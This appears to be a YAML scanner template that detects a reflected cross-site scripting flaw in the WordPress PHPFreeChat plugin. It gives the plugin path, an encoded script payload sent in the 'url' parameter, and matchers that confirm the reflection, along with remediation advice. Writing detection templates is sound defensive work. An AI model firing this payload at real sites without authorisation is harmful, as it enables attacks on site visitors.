id: wp-phpfreechat-xss
info:
  name: WordPress Plugin PHPFreeChat - 'url' Reflected Cross-Site Scripting (XSS)
  author:
  - l0ne1y
  description: |-
    WordPress Plugin PHPFreeChat cross-site scripting vulnerability
    WordPress and WordPress plugin are both products of the WordPress Foundation. WordPress is a blogging platform developed using PHP language. The platform supports setting up personal blog websites on PHP and MySQL servers. WordPress plugin is an application plugin.

    A cross-site scripting vulnerability exists in the url parameter in PHPFreeChat. The vulnerability results from failure to validate user-supplied input. An attacker can exploit this vulnerability to execute arbitrary script code in an unspecified user's browser in the context of an affected site, and can steal cookie-based authentication certificates to launch other attacks.
  severity: medium
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program: http://wordpress.org/extend/plugins/

    Temporary fix:
    1. Filter the input (and URL parameters), encode the output, and combine the whitelist and blacklist. That is to say, filter all submitted content, filter the parameters in the URL, and filter out relevant content that will cause the script to be executed; and then HTML-encode the content dynamically output to the page so that the script cannot be executed in the browser. Although input filtering can be bypassed, a large number of XSS attacks will still be intercepted; finally, characters are whitelisted or blacklisted.
requests:
- matchers:
  - type: word
    part: body
    words:
    - </script><script>alert(document.domain)</script>
  - type: word
    part: header
    words:
    - text/html
  - type: status
    status:
    - 200
  matchers-condition: and
  path:
  - '{{BaseURL}}/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
  method: GET
